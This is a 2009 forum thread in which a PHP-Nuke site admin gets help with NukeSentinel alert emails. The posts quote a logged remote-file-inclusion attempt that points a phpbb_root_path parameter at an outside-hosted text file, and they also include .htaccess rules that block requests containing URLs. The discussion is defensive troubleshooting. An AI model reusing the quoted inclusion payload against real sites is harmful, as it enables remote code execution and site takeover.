Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x
Author Message
hamrdeye
Hangin' Around


Joined: Aug 20, 2008
Posts: 28

PostPosted: Tue Sep 29, 2009 2:59 pm Reply with quote

I keep getting tons of these emails emailed to my admin account on our website. I recently updated to Raven Nuke from 8.1 phpnuke. I am getting like 10 a day, and I am not sure what is wrong as I am having difficulty understanding the message.

I can't paste the message here I am getting "The resource/content requested is not in an acceptable format."

How can I supply the email?
 
View user's profile Send private message
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Tue Sep 29, 2009 3:10 pm Reply with quote

Just paste the main text message from the email. It doesn't need to contain any formatting.

That said, without knowing what types of messages you're getting (i.e. which blockers are being triggered), are you using request method or string blockers? Also, harvester and referer blocks can be triggered frequently if these happen on your sites.

For some blocks, you may wish NOT to receive an email. For example, harvesters and referers are blocked before they can do anything on your site, so you probably don't need an email every time they visit. To turn off emails, just change the Activate setting for these blockers to something that does not include email.

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
hamrdeye
PostPosted: Tue Sep 29, 2009 8:24 pm Reply with quote

The message is from: Mail Delivery System
With a subject of : Mail delivery failed: returning message to sender

So its like my site is trying to send something, but yet the email is from Nuke Sentinel.


I will attempt to paste again...

Code:
This message was created automatically by mail delivery software.


A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  Only registered users can see links on this board! Get registered or login!
    Unrouteable address

------ This is a copy of the message, including all the headers. ------

Return-path: <dofadmin@teamdof.com>
Received: from teamdof by server307.serverquality.com with local (Exim 4.69)
(envelope-from <dofadmin@teamdof.com>)
id 1MsXzO-0002JD-Et
for Only registered users can see links on this board! Get registered or login!; Tue, 29 Sep 2009 03:23:14 -0500
To: e <w@server307.serverquality.com>
Subject: Blocked abuse from 195.186.64.229
From: Only registered users can see links on this board! Get registered or login!
Reply-To: Only registered users can see links on this board! Get registered or login!
Date: Tue, 29 Sep 2009 03:23:14 -0500
X-LibVersion: 3.3.2_4
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Message-ID: <20090929082314.8877.622664592.swift@www.teamdof.com>
X-ServerQuality-MailScanner-Information: Please contact the ISP for more information
X-ServerQuality-MailScanner-ID: 1MsXzO-0002JD-Et
X-ServerQuality-MailScanner: Found to be clean
X-ServerQuality-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
score=-2.6, required 7, autolearn=not spam, BAYES_00 -2.60,
NO_RELAYS -0.00)
X-ServerQuality-MailScanner-From: Only registered users can see links on this board! Get registered or login!
X-Spam-Status: No

Created By: NukeSentinel(tm) 2.6.02
Date &amp; Time: 2009-09-29 03:23:14 CDT GMT -0500
Blocked IP: 195.186.64.229
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/5.0
HTTP Host: Only registered users can see links on this board! Get registered or login!
Script Name: /modules.php
Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt???
Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt???
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 195.186.64.229
Remote Port: 9463
Request Method: GET


Ok I had to add spaces to the Query String and Get String lines for the forum to allow the post..

I have got 15 of these so far today..

I do get emails to my admin account regarding blocked ip's but not this frequently.. I have no idea where the "w@server307.serverquality.com" is from...????
 
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Wed Sep 30, 2009 12:21 am Reply with quote

Well it looks like someone has been attempting to hack you site, but NS has blocked them.

Check the email address set in you NS admin panel.
 
View user's profile Send private message
kd8hho
Worker
Worker


Joined: Mar 30, 2009
Posts: 116

PostPosted: Wed Sep 30, 2009 4:38 pm Reply with quote

Code:


Referer: none
User Agent: Mozilla/5.0
HTTP Host: Only registered users can see links on this board! Get registered or login!
Script Name: /modules.php
Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt???
Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt???
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 195.186.64.229
Remote Port: 9463
Request Method: GET


i get that alot. iirc its trying to upload a shell script into your site. i think i block 5 to 10 a day myself.

make sure your e-mail is set rigt in NS admin as jakec said

_________________
Linux Register User #481509 | Ubuntu Register User #25492 
View user's profile Send private message Visit poster's website
hamrdeye
PostPosted: Wed Sep 30, 2009 10:45 pm Reply with quote

Well the email was set wrong in NS.. I changed it. I think that stopped it.. Will report if it didn't..

Thanks for the help...

BTW - Should NS be blocking the offending ip's? Cause I have nothing in my blocked ip list. I have changed the permissions to 666 and the path appears to be right in NS prefs. Is there something else I need to do?
 
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 236

PostPosted: Wed Sep 30, 2009 11:42 pm Reply with quote

If you add these lines in your .htaccess these types of hacks will be blocked prior to Sentinel and you will then not get any more of these emails:

RewriteEngine On


RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]
 
View user's profile Send private message
jakec
PostPosted: Thu Oct 01, 2009 12:21 am Reply with quote

Blocked IP's are saved in two places, the database and the .htaccess file. If this is not happening make sure the blocker settings are set correctly in NS.
 
hamrdeye
PostPosted: Thu Oct 01, 2009 10:17 am Reply with quote

It was the blocker settings. I will add the code to my .htacess file also..

Thanks!
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©